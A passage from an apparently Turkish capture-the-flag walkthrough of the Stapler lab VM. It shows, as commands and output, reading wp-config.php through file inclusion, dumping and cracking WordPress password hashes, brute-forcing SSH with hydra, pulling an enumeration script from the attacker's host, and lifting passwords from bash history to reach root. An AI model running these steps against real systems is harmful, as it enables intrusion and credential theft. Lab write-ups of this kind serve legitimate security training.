https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/1022270830.jpeg --no-check-certificate                                            \n--2021-05-29 21:09:24--  https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/1022270830.jpeg\nConnecting to 192.168.0.25:12380... connected.\nWARNING: The certificate of \u2018192.168.0.25\u2019 is not trusted.\nWARNING: The certificate of \u2018192.168.0.25\u2019 doesn&#039;t have a known issuer.\nThe certificate&#039;s owner does not match hostname \u2018192.168.0.25\u2019\nHTTP request sent, awaiting response... 200 OK\nLength: 3042 (3.0K) [image\/jpeg]\nSaving to: \u20181022270830.jpeg\u2019\n\n1022270830.jpeg                                             100%[========================================================================================================================================&gt;]   2.97K  --.-KB\/s    in 0s      \n\n2021-05-29 21:09:24 (66.0 MB\/s) - \u20181022270830.jpeg\u2019 saved [3042\/3042]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ls                                                                                                                                            \n1022270830.jpeg  39646.py  cer.cer  note  todo-list.txt  vsftpd.conf  wordpress  wordpress-4.tar.gz  wpresult\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat 1022270830.jpeg                                                                                                                           \n&lt;?php\n\/**\n * The base configurations of the WordPress.\n *\n * This file has the following configurations: MySQL settings, Table Prefix,\n * Secret Keys, and ABSPATH. You can find more information by visiting\n * {@link https:\/\/codex.wordpress.org\/Editing_wp-config.php Editing wp-config.php}\n * Codex page. You can get the MySQL settings from your web host.\n *\n * This file is used by the wp-config.php creation script during the\n * installation. You don&#039;t have to use the web site, you can just copy this file\n * to &quot;wp-config.php&quot; and fill in the values.\n *\n * @package WordPress\n *\/\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine(&#039;DB_NAME&#039;, &#039;wordpress&#039;);\n\n\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;root&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;plbkac&#039;);\n\n\/** MySQL hostname *\/\ndefine(&#039;DB_HOST&#039;, &#039;localhost&#039;);\n\n\/** Database Charset to use in creating database tables. *\/\ndefine(&#039;DB_CHARSET&#039;, &#039;utf8mb4&#039;);\n\n\/** The Database Collate type. Don&#039;t change this if in doubt. *\/\ndefine(&#039;DB_COLLATE&#039;, &#039;&#039;);\n\n\/**#@+\n * Authentication Unique Keys and Salts.\n *\n * Change these to different unique phrases!\n * You can generate these using the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}\n * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine(&#039;AUTH_KEY&#039;,         &#039;V 5p=[.Vds8~SX;&gt;t)++Tt57U6{Xe`T|oW^eQ!mHr }]&gt;9RX07W&lt;sZ,I~`6Y5-T:&#039;);\ndefine(&#039;SECURE_AUTH_KEY&#039;,  &#039;vJZq=p.Ug,]:&lt;-P#A|k-+:;JzV8*pZ|K\/U*J][Nyvs+}&amp;!\/#&gt;4#K7eFP5-av`n)2&#039;);\ndefine(&#039;LOGGED_IN_KEY&#039;,    &#039;ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU&lt;cr.wm?|jqZH:YMv;zu@tM7P:4o&#039;);\ndefine(&#039;NONCE_KEY&#039;,        &#039;j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO&#039;);\ndefine(&#039;AUTH_SALT&#039;,        &#039;I{gDlDs`Z@.+\/AdyzYw4%+&lt;WsO-LDBHT}&gt;}!||Xrf@1E6jJNV={p1?yMKYec*OI$&#039;);\ndefine(&#039;SECURE_AUTH_SALT&#039;, &#039;.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*&gt;#z+p&gt;nVi10`XOUq (Zml~op3SG4OG_D&#039;);\ndefine(&#039;LOGGED_IN_SALT&#039;,   &#039;[Zz!)%R7\/w37+:9L#.=hL:cyeMM2kTx&amp;_nP4{D}n=y=FQt%zJw&gt;c[a+;ppCzIkt;&#039;);\ndefine(&#039;NONCE_SALT&#039;,       &#039;tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN\/9xeTsK]#ga_9:hJ&#039;);\n\n\/**#@-*\/\n\n\/**\n * WordPress Database Table prefix.\n *\n * You can have multiple installations in one database if you give each a unique\n * prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix  = &#039;wp_&#039;;\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\/\ndefine(&#039;WP_DEBUG&#039;, false);\n\n\/* That&#039;s all, stop editing! Happy blogging. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( !defined(&#039;ABSPATH&#039;) )\n    define(&#039;ABSPATH&#039;, dirname(__FILE__) . &#039;\/&#039;);\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once(ABSPATH . &#039;wp-settings.php&#039;);\n\ndefine(&#039;WP_HTTP_BLOCK_EXTERNAL&#039;, true);<\/code><\/pre>\n<p>LFI ile wp-config.php dosyas\u0131n\u0131n i\u00e7eri\u011fini elde etmi\u015f olduk. Nmap \u00e7\u0131kt\u0131s\u0131nda mysql servisi a\u00e7\u0131kt\u0131 \u015fimdi bu servise ba\u011flanal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali]\n\u2514\u2500# mysql -u root -h 192.168.0.25 -p \nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 6\nServer version: 5.7.12-0ubuntu1 (Ubuntu)\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMySQL [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| loot               |\n| mysql              |\n| performance_schema |\n| phpmyadmin         |\n| proof              |\n| sys                |\n| wordpress          |\n+--------------------+\n8 rows in set (0.007 sec)\n\nMySQL [(none)]&gt; use wordpress;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMySQL [wordpress]&gt; show tables;\n+-----------------------+\n| Tables_in_wordpress   |\n+-----------------------+\n| wp_commentmeta        |\n| wp_comments           |\n| wp_links              |\n| wp_options            |\n| wp_postmeta           |\n| wp_posts              |\n| wp_term_relationships |\n| wp_term_taxonomy      |\n| wp_terms              |\n| wp_usermeta           |\n| wp_users              |\n+-----------------------+\n11 rows in set (0.002 sec)\n\nMySQL [wordpress]&gt; select * from ep_users;\nERROR 1146 (42S02): Table &#039;wordpress.ep_users&#039; doesn&#039;t exist\nMySQL [wordpress]&gt; select * from wp_users;\n+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+\n| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |\n+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+\n|  1 | John       | $P$B7889EMq\/erHIuZapMB8GEizebcIy9. | john          | john@red.localhost    | http:\/\/localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |\n|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ\/xEgv4my0 | elly          | Elly@red.localhost    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |\n|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | peter@red.localhost   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |\n|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | barry@red.localhost   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |\n|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | heather@red.localhost |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |\n|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | garry@red.localhost   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |\n|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | harry@red.localhost   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |\n|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | scott@red.localhost   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |\n|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | kathy@red.localhost   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |\n| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | tim@red.localhost     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |\n| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | zoe@red.localhost     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |\n| 12 | Dave       | $P$Bl7\/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | dave@red.localhost    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |\n| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK\/7tEcz0 | simon         | simon@red.localhost   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |\n| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe\/uqR.48ofs. | abby          | abby@red.localhost    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |\n| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | vicki@red.localhost   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |\n| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | pam@red.localhost     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |\n+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+\n16 rows in set (0.002 sec)\n\nMySQL [wordpress]&gt; select concat_ws(\u2018:\u2019, user_login, user_pass) from wp_users;\nERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;:\u2019, user_login, user_pass) from wp_users&#039; at line 1\nMySQL [wordpress]&gt; select concat_ws(&#039;:&#039;, user_login, user_pass) from wp_users;\n+--------------------------------------------+\n| concat_ws(&#039;:&#039;, user_login, user_pass)      |\n+--------------------------------------------+\n| John:$P$B7889EMq\/erHIuZapMB8GEizebcIy9.    |\n| Elly:$P$BlumbJRRBit7y50Y17.UPJ\/xEgv4my0    |\n| Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0   |\n| barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0   |\n| heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |\n| garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1   |\n| harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0   |\n| scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1   |\n| kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0   |\n| tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0     |\n| ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1     |\n| Dave:$P$Bl7\/V9Lqvu37jJT.6t4KWmY.v907Hy.    |\n| Simon:$P$BLxdiNNRP008kOQ.jE44CjSK\/7tEcz0   |\n| Abby:$P$ByZg5mTBpKiLZ5KxhhRe\/uqR.48ofs.    |\n| Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131   |\n| Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0     |\n+--------------------------------------------+\n16 rows in set (0.002 sec)\n<\/code><\/pre>\n<p>Burdan ve smb ile ede etti\u011fim kullan\u0131c\u0131lardan bir users dosyas\u0131 olu\u015fturdum. Daha sonras\u0131nda <strong>phpass<\/strong> forrmat\u0131ndaki hash'leri k\u0131rmak i\u00e7injohn kulland\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt --rules --format=phpass\nUsing default input encoding: UTF-8\nLoaded 16 password hashes with 16 different salts (phpass [phpass ($P$ or $H$) 128\/128 AVX 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\ncookie           (scott)\nmonkey           (harry)\nfootball         (garry)\ncoolgirl         (kathy)\nwashere          (barry)\nincorrect        (John)\nthumb            (tim)\n0520             (Pam)\npassphrase       (heather)\ndamachine        (Dave)\nylle             (Elly)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat users \nelly\nNATHAN\nzoe\nkai\nmel\nTaylor\nSHAY\njess\nDrew\nSam\njamie\nJLipps\nLSolum2\nEeth\nCJoo\nJKanode\nCCeaser\nSStroud\nMFrei\nIChadwick\nJBare\nMBassin\nSHayslett\nAParnell\nDSwanger\nETollefson\nRNunemaker\npeter\nroot\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat pass \ncookie\nmonkey\nfootball\ncoolgirl\nwashere\nincorrect\nthumb\n0520\nplbkac\n<\/code><\/pre>\n<p>ssh servisinn a\u00e7\u0131k oldu\u011funu biliyoruz hydra ile elimizdeki bilgilerle bir sald\u0131r\u0131 ba\u015flatt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# hydra -L users -P pass  ssh:\/\/192.168.0.25 -e nsr &gt;&gt; hydra_result\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat hydra_result\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-05-30 14:56:40\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 348 login tries (l:29\/p:12), ~22 tries per task\n[DATA] attacking ssh:\/\/192.168.0.25:22\/\n[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac\n[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac\n[STATUS] 115.00 tries\/min, 115 tries in 00:01h, 235 to do in 00:03h, 16 active\n[22][ssh] host: 192.168.0.25   login: JBare   password: cookie\n[22][ssh] host: 192.168.0.25   login: SHayslett   password: SHayslett\n1 of 1 target successfully completed, 4 valid passwords found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-05-30 14:59:35\n<\/code><\/pre>\n<p>Harika art\u0131k ssh ba\u011flant\u0131s\u0131 yapabiliriz.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ssh JBare@192.168.0.25                                                                                                                                                                                                             255 \u2a2f\n-----------------------------------------------------------------\n~          Barry, don&#039;t forget to put a message here           ~\n-----------------------------------------------------------------\nJBare@192.168.0.25&#039;s password: \nWelcome back!\n\nJBare@red:~$ whoami\nJBare\nJBare@red:~$ cd \/tmp\/\n<\/code><\/pre>\n<p>Bu noktadan sonra <a href=\"https:\/\/github.com\/kudayDOTsite\/linux-smart-enumeration\">https:\/\/github.com\/kudayDOTsite\/linux-smart-enumeration<\/a> projesi ile enum i\u015flemi ger\u00e7ekle\u015ftrece\u011fim. \u0130lgili sh doyas\u0131n\u0131 hedef makineye kopyalad\u0131m.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/tmp$ wget http:\/\/192.168.0.21:1822\/lse.sh\n--2021-05-30 23:03:57--  http:\/\/192.168.0.21:1822\/lse.sh\nConnecting to 192.168.0.21:1822... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 41177 (40K) [text\/x-sh]\nSaving to: \u2018lse.sh\u2019\n\nlse.sh                                                      100%[========================================================================================================================================&gt;]  40.21K  --.-KB\/s    in 0s      \n\n2021-05-30 23:03:57 (199 MB\/s) - \u2018lse.sh\u2019 saved [41177\/41177]\n\nJBare@red:\/tmp$ chmod 777 lse.sh<\/code><\/pre>\n<p>Ve ba\u015flatt\u0131m.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/tmp$ .\/lse.sh -l2  &gt;&gt; result.txt\nIf you know the current user password, write it here to check sudo privileges: cookie<\/code><\/pre>\n<p>Bu g\u00f6sterdi\u011fim ekran g\u00f6r\u00fcnt\u00fcs\u00fc sonu\u00e7lar\u0131ns adece k\u00fc\u00e7\u00fck bir b\u00f6l\u00fcm\u00fc:<\/p>\n<pre><code class=\"language-sh\">[!] fst050 Uncommon setgid binaries........................................ skip\n[!] fst060 Can we write to any setgid binary?.............................. skip\n[*] fst070 Can we read \/root?.............................................. nope\n[*] fst080 Can we read subdirectories under \/home?......................... yes!\n---\ntotal 24\ndrwxr-xr-x  2 AParnell AParnell 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root     root     4096 Jun  4  2016 ..\n-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history\n-rw-r--r--  1 AParnell AParnell  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 AParnell AParnell 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 AParnell AParnell  675 Sep  1  2015 .profile\ntotal 24\ndrwxr-xr-x  2 CCeaser CCeaser 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root    root    4096 Jun  4  2016 ..\n-rw-r--r--  1 root    root      10 Jun  5  2016 .bash_history\n-rw-r--r--  1 CCeaser CCeaser  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 CCeaser CCeaser 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 CCeaser CCeaser  675 Sep  1  2015 .profile\ntotal 24\ndrwxr-xr-x  2 CJoo CJoo 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root root 4096 Jun  4  2016 ..\n-rw-r--r--  1 root root    5 Jun  5  2016 .bash_history\n-rw-r--r--  1 CJoo CJoo  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 CJoo CJoo 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 CJoo CJoo  675 Sep  1  2015 .profile\ntotal 24\ndrwxr-xr-x  2 DSwanger DSwanger 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root     root     4096 Jun  4  2016 ..\n-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history\n-rw-r--r--  1 DSwanger DSwanger  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 DSwanger DSwanger 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 DSwanger DSwanger  675 Sep  1  2015 .profile<\/code><\/pre>\n<p>B\u00fct\u00fcn kullan\u0131c\u0131lar\u0131n alt\u0131nda .bash_history'i g\u00f6rebiliyoruz ve root haklar\u0131nda. Bunun \u00fczerine a\u015fa\u011fd\u0131ki gibi bir i\u015flem ger\u00e7ekletirdim.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/home$ ls -l\ntotal 120\ndrwxr-xr-x 2 AParnell   AParnell   4096 Jun  5  2016 AParnell\ndrwxr-xr-x 2 CCeaser    CCeaser    4096 Jun  5  2016 CCeaser\ndrwxr-xr-x 2 CJoo       CJoo       4096 Jun  5  2016 CJoo\ndrwxr-xr-x 2 Drew       Drew       4096 Jun  5  2016 Drew\ndrwxr-xr-x 2 DSwanger   DSwanger   4096 Jun  5  2016 DSwanger\ndrwxr-xr-x 2 Eeth       Eeth       4096 Jun  5  2016 Eeth\ndrwxr-xr-x 2 elly       elly       4096 Jun  5  2016 elly\ndrwxr-xr-x 2 ETollefson ETollefson 4096 Jun  5  2016 ETollefson\ndrwxr-xr-x 2 IChadwick  IChadwick  4096 Jun  5  2016 IChadwick\ndrwxr-xr-x 2 jamie      jamie      4096 Jun  5  2016 jamie\ndrwxr-xr-x 3 JBare      JBare      4096 May 30 22:24 JBare\ndrwxr-xr-x 2 jess       jess       4096 Jun  5  2016 jess\ndrwxr-xr-x 2 JKanode    JKanode    4096 Jun  5  2016 JKanode\ndrwxr-xr-x 2 JLipps     JLipps     4096 Jun  5  2016 JLipps\ndrwxr-xr-x 2 kai        kai        4096 Jun  5  2016 kai\ndrwxr-xr-x 2 LSolum     LSolum     4096 Jun  5  2016 LSolum\ndrwxr-xr-x 2 LSolum2    LSolum2    4096 Jun  5  2016 LSolum2\ndrwxr-xr-x 2 MBassin    MBassin    4096 Jun  5  2016 MBassin\ndrwxr-xr-x 2 mel        mel        4096 Jun  5  2016 mel\ndrwxr-xr-x 2 MFrei      MFrei      4096 Jun  5  2016 MFrei\ndrwxr-xr-x 2 NATHAN     NATHAN     4096 Jun  5  2016 NATHAN\ndrwxr-xr-x 3 peter      peter      4096 Jun  3  2016 peter\ndrwxr-xr-x 2 RNunemaker RNunemaker 4096 Jun  5  2016 RNunemaker\ndrwxr-xr-x 2 Sam        Sam        4096 Jun  5  2016 Sam\ndrwxr-xr-x 2 SHAY       SHAY       4096 Jun  5  2016 SHAY\ndrwxr-xr-x 3 SHayslett  SHayslett  4096 May 30 22:24 SHayslett\ndrwxr-xr-x 2 SStroud    SStroud    4096 Jun  5  2016 SStroud\ndrwxr-xr-x 2 Taylor     Taylor     4096 Jun  5  2016 Taylor\ndrwxrwxrwx 2 www        www        4096 Jun  5  2016 www\ndrwxr-xr-x 3 zoe        zoe        4096 May 30 22:57 zoe\nJBare@red:\/home$ cat AParnell\/.bash\ncat: AParnell\/.bash: No such file or directory\nJBare@red:\/home$ cat AParnell\/.bash_history \nexit\nJBare@red:\/home$ cat CCeaser\/.bash_history \nfree\nexit\nJBare@red:\/home$ cat CJoo\/.bash_history \nexit\nJBare@red:\/home$ cat Drew\/.bash_history \nexit\nJBare@red:\/home$ cat DSwanger\/.bash_history \nexit\nJBare@red:\/home$ cat Eeth\/.bash_history \nexit\nJBare@red:\/home$ cat elly\/.bash_history \nexit\nJBare@red:\/home$ cat ETollefson\/.bash_history \nexit\nJBare@red:\/home$ cat IChadwick\/.bash_history \nexit\nJBare@red:\/home$ cat jamie\/.bash_history \ntop\nps aux\nexit\nJBare@red:\/home$ cat JBare\/.bash_history \nexit\nJBare@red:\/home$ cat jess\/.bash_history \nexit\nJBare@red:\/home$ cat JKanode\/.bash_history \nid\nwhoami\nls -lah\npwd\nps aux\nsshpass -p thisimypassword ssh JKanode@localhost\napt-get install sshpass\nsshpass -p JZQuyIN5 peter@localhost\nps -ef\ntop\nkill -9 3747\nexit\nJBare@red:\/home$ <\/code><\/pre>\n<p>Bu harika \u00e7\u00fcnk\u00fc lse.sh scripttini \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda bana \u015f\u00f6yle bir bilgide vermi\u015fti.<\/p>\n<pre><code class=\"language-sh\">[*] usr020 Are there other users in an administrative groups?.............. yes!\n---\nsudo:x:27:peter\n---\n[*] usr030 Other users with shell.......................................... yes!\n---\n<\/code><\/pre>\n<p>peter kullan\u0131c\u0131s\u0131 sudo grubunun bir par\u00e7as\u0131.! Bunun \u00fczerine peter kullan\u0131c\u0131s\u0131na ge\u00e7i\u015f yapt\u0131m.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/home$ su peter\nPassword: \n\nThis is the Z Shell configuration function for new users,\nzsh-newuser-install.\nYou are seeing this message because you have no zsh startup files\n(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory\n~).  This function can help you with a few settings that should\nmake your use of the shell easier.\n\nYou can:\n\n(q)  Quit and do nothing.  The function will be run again next time.\n\n(0)  Exit, creating the file ~\/.zshrc containing just a comment.\n     That will prevent this function being run again.\n\n(1)  Continue to the main menu.\n\n(2)  Populate your ~\/.zshrc with the configuration recommended\n     by the system administrator and exit (you will need to edit\n     the file by hand, if so desired).\n\n--- Type one of the keys in parentheses --- \n\nAborting.\nThe function will be run again next time.  To prevent this, execute:\n  touch ~\/.zshrc\nred% ls\nAParnell  CCeaser  CJoo  Drew  DSwanger  Eeth  elly  ETollefson  IChadwick  jamie  JBare  jess  JKanode  JLipps  kai  LSolum  LSolum2  MBassin  mel  MFrei  NATHAN  peter  RNunemaker  Sam  SHAY  SHayslett  SStroud  Taylor  www  zoe\nred% whoami\npeter\nred% <\/code><\/pre>\n<p>Okay! Hadi i\u015fi tamamlayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">red% whoami\npeter\nred% id\nuid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)\nred% sudo su\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for peter: \nSorry, try again.\n[sudo] password for peter: \n\u279c  \/home whoami\nroot\n\u279c  \/home cd \/root \n\u279c  ~ ls\nfix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql\n\u279c  ~ cat flag.txt \n~~~~~~~~~~&lt;(Congratulations)&gt;~~~~~~~~~~\n                          .-&#039;&#039;&#039;&#039;&#039;-.\n                          |&#039;-----&#039;|\n                          |-.....-|\n                          |       |\n                          |       |\n         _,._             |       |\n    __.o`   o`&quot;-.         |       |\n .-O o `&quot;-.o   O )_,._    |       |\n( o   O  o )--.-&quot;`O   o&quot;-.`&#039;-----&#039;`\n &#039;--------&#039;  (   o  O    o)  \n              `----------`\nb6b545dc11b7a270f4bad23432190c75162c4a2b<\/code><\/pre>\n<p><strong>Not:<\/strong><br \/>\n\u00c7\u00f6z\u00fcm esnas\u0131nda a\u015fa\u011f\u0131daki \u00e7\u0131kt\u0131larla yetki y\u00fckseltme exploitleri denedim ancak bir sonuca ula\u015famd\u0131m. Halbu ki s\u00fcr\u00fcmler son derece uygundu...<\/p>\n<pre><code class=\"language-sh\">\u279c  ~ uname -a\nLinux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU\/Linux\n\u279c  ~ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription:    Ubuntu 16.04 LTS\nRelease:    16.04\nCodename:   xenial<\/code><\/pre>\n<pre><code class=\"language-sh\">\u2514\u2500# searchsploit ubuntu linux kernel Local Privilege 4.4\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                                                                             |  Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nLinux Kernel 4.4 (Ubuntu 16.04) - &#039;BPF&#039; Local Privilege Escalation (Metasploit)                                                                                                                            | linux\/local\/40759.rb\nLinux Kernel 4.4.0 (Ubuntu 14.04\/16.04 x86-64) - &#039;AF_PACKET&#039; Race Condition Privilege Escalation                                                                                                           | linux_x86-64\/local\/40871.c\nLinux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                                                                        | linux\/local\/41458.c\nLinux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter &#039;target_offset&#039; Out-of-Bounds Privilege Escalation                                                                                                    | linux_x86-64\/local\/40049.c\nLinux Kernel 4.4.0-21 &lt; 4.4.0-51 (Ubuntu 14.04\/16.04 x64) - &#039;AF_PACKET&#039; Race Condition Privilege Escalation                                                                                                | windows_x86-64\/local\/47170.c\nLinux Kernel 4.4.x (Ubuntu 16.04) - &#039;double-fdput()&#039; bpf(BPF_PROG_LOAD) Privilege Escalation                                                                                                               | linux\/local\/39772.txt\nLinux Kernel &lt; 4.13.9 (Ubuntu 16.04 \/ Fedora 27) - Local Privilege Escalation                                                                                                                              | linux\/local\/45010.c\nLinux Kernel &lt; 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                                                                     | linux\/local\/44298.c\nLinux Kernel &lt; 4.4.0-21 (Ubuntu 16.04 x64) - &#039;netfilter target_offset&#039; Local Privilege Escalation                                                                                                          | linux_x86-64\/local\/44300.c\nLinux Kernel &lt; 4.4.0-83 \/ &lt; 4.8.0-58 (Ubuntu 14.04\/16.04) - Local Privilege Escalation (KASLR \/ SMEP)                                                                                                      | linux\/local\/43418.c\nLinux Kernel &lt; 4.4.0\/ &lt; 4.8.0 (Ubuntu 14.04\/16.04 \/ Linux Mint 17\/18 \/ Zorin) - Local Privilege Escalation (KASLR \/ SMEP)                                                                                  | linux\/local\/47169.c\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: Average beginner\/intermediate VM, only a few twists May find it easy\/hard (depends on YOUR background) &#8230;also which way you attack the&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" 